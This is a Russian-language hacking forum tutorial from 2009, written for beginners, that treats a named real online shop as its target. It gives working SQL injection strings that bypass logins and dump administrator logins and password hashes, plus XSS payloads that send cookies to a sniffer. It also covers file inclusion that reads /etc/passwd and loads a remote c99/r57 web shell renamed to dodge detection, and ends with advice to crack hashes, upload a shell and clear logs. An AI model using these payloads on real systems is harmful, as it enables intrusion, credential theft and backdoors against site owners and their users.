[ Attackers.io.ua © 2009 ] ALL WEB IN HERE...

 

Пополняем знания как искать баги!




<Предисловие>
Всем привет!Не так давно я был нубом и нефига не умел, но у меня такое желание было научится, что я токо полгода изучаю хак и добился много чего! Сегодня я хочу новичкам рассказать как надо обращатся с сайтом! P.S Не судите строго это моя первая статья!
Так поехали!Жертва станет shop.iskusnitsa.ru!
Первым делом мы ставим сайтег на какой-нить сканер, и сами начинаем проверять РУКАМИ!!!Начнем с обследования сайта.
1:НАПЯЛИВАЕМ ПРОКСИ!!!Элиту есть такая прога как proxyswitcher! Вот ее советую, т.к. сам юзаю!Потом заходим на 2ip.ru;leader.ru;myip.ru и проверяемся если написано , что типо это не настоящий айпи а роутера и т.п. то меняем а если все норм приступаем!
2:Так походим по сылкам посмотрим где что и как переменые передаются!Сделали.
3:Где админка находится(чаще всего /admin /manager /webroot /administration /administrator) И надо посмотреть /robots.txt на многих сайтах этот документ есть - там много что интересного!:) И пробуем /phpinfo.php Этот файлик хорош!:)Там тож много интересного
4:Пробуем такие фишки в логин как- ' or 1=1/* , ' or 'a'='a/* , admin'# Это SQL авторизация !admin'# Сайт читает все до ' а остальное отбрасывает как комент # есть еще коменты как /* --
5:Смотрим на XSS пишем в поиск {script}alert(){/script} или {font color=red}12331414414 Кароче если {script}alert(){/script} или {font color=red} не знаете что это обозначает то идем сюда google.ru и пишем ХТМЛ основы!Потом JS основы!Вот а если вы поняли эти строки то двигаемся дальше!5(а)Если выскочила табличка или поменялись цвета,то пишем {script}СНИФЕР+document.cookie{/script}Снифер онлайн лучше я думаю:)Hacker-pro.net xaknet.ru Там раздел сниферы! так полученный результат в поиске суем админу чтоб он зашел на эту страницу ТАК это называется ПАССИВКА XSS! МОжно,если в коментах XSS то там тоже ставим снифер, А ЭТО УЖЕ АКТИВНАЯ XSS!Кто понял различие:)?Красава!Пасивку мы кидаем жертве, а активную она сама зайдет будь это коменты или гостевухы и т.п.!
6:Если где-нибудь находим переменные и т.п. типа ...../index.php?p=чему-нибудь то пробуем место чего-нибудь поставить sdfspfjscmawe Если выпадает ошибка Warning:include...... это PHP-include!Бывают локальные и обычный 6(а):Если локальный то можно смотреть дирректорие!Например:index.php?p=etc/passwd Очень часто сервер сам приписывает .php .html .shtml .phtml и т.п. Надо это убрать!А как?Просто в природе есть Ядовитые нули или NULL-byte %00 он отсекает остальное ТО ЕСТЬ index.php=etc/passwd%00, ../-вверх дир!А если у нас не локальная, а обычная -6(б) то делаем так index.php?p=наш сайт.ru/shell.php(заметьте что успешность зависит от шелла)Если о5 же Сайт приписывает .php....То мы указываем без оканчания шелла смотрим index.php?p=http://xakep.narod.ru/shell и все, а если не приписывает то так index.php?p=http://xakep.narod.ru/shell.php Совет:регайся на народе!И там разводи шелики!Совет:ЮЗАЙ С99 | R57 Самое то!(Commands: cat -Просмотр чего-то(исходник) find(найти) ls(просмотр директорий) ls впринципе тебе не надо будет:) id-просмотр своих прав вот основные комманды)Совет:На народе я нашел что-то типо антибан за вирусы и т.п. в нашем случае шелл шелл-это типо можно считать бэкдор!Система народа агрится на c99.php r57.php shell.php Попробуй переименовать на adjklkx.php!
Далее-
7:Попробуем в поиск поставить следущее aa') Ииииииииииииии хопачки!Вы дало скулю!Это хорошо самая распространенная бага:)
8:Пишем следущее aa') order by 10/* (Нигде не ставим + друзья новички это мы ставим токо в адресной строки! )!Так страница загрузилась!Идем дальше!aa') order by 20/*Ошибка берем 15! aa') order by 13/*Отобразилась терь истина 14!aa') order by 14/*Ошибка значит 13полей!Делаем такой запросик aa') union select 1,2,3,4,5,6,7,8,9,10,11,12,13/*Видим 3 4 5 выводимые поля!Теперь узнаем версию БД это у нас VERSION() aa') union select 1,2,3,VERSION(),5,6,7,8,9,10,11,12,13/*Ггггг НОВИЧКИ не хватает места НАДО ЛЕЗТЬ В СУРС страницы и искать поиск и там найдете maxlength=50 50 меняете на 9000!Терь все норм и видим что -5 версия =>есть шема! Делаем такой запрос aa') union select 1,2,3,table_name,5,6,7,8,9,10,11,12,13 from information_schema.tables/* Листаем и видим SITE_admin! Теперь мы делаем последний запросик aa') union select 1,2,login,password,email,6,7,8,9,10,11,12,13 from site_admin/*Ух ты 2админа 1стандарт manager а другой дядько лох)))))и там их хеши!И ящики!И логины!Такася идем на google.com и вбиваем passwordpro и скачиваем,а у кого есть не надо!Так вставляем хеш!И ура у нас ПАСС от админки!Терь заходим в админку заливаем шелл!И чистим логи(со своим айпи - прокси)
P.S Новички не надо лишних вопросов про SQL XSS PHP есть товарищ как ГУГЛ:) ===================================================== -q3rl0w- ДЛЯ НОВИЧКОВ! ===================================================== При копирование копируйте ВСЕ!

q3rl0w ДЛЯ !HZ!


Создан 04 ноя 2009



  Комментарии       
Имя или Email


При указании email на него будут отправляться ответы
Как имя будет использована первая часть email до @
Сам email нигде не отображается!
Зарегистрируйтесь, чтобы писать под своим ником
 





DaMaGeLaB Pro-Hack.Ru XakNet TeaM InAttack BlackHack.Ru The Mafia
k0d.cc GraBBerZ.CoM BruteR.InfO Планету-ХаКеРаМ Defeated.Ru
World UNIX SecNull.Org CardersPlanet.Biz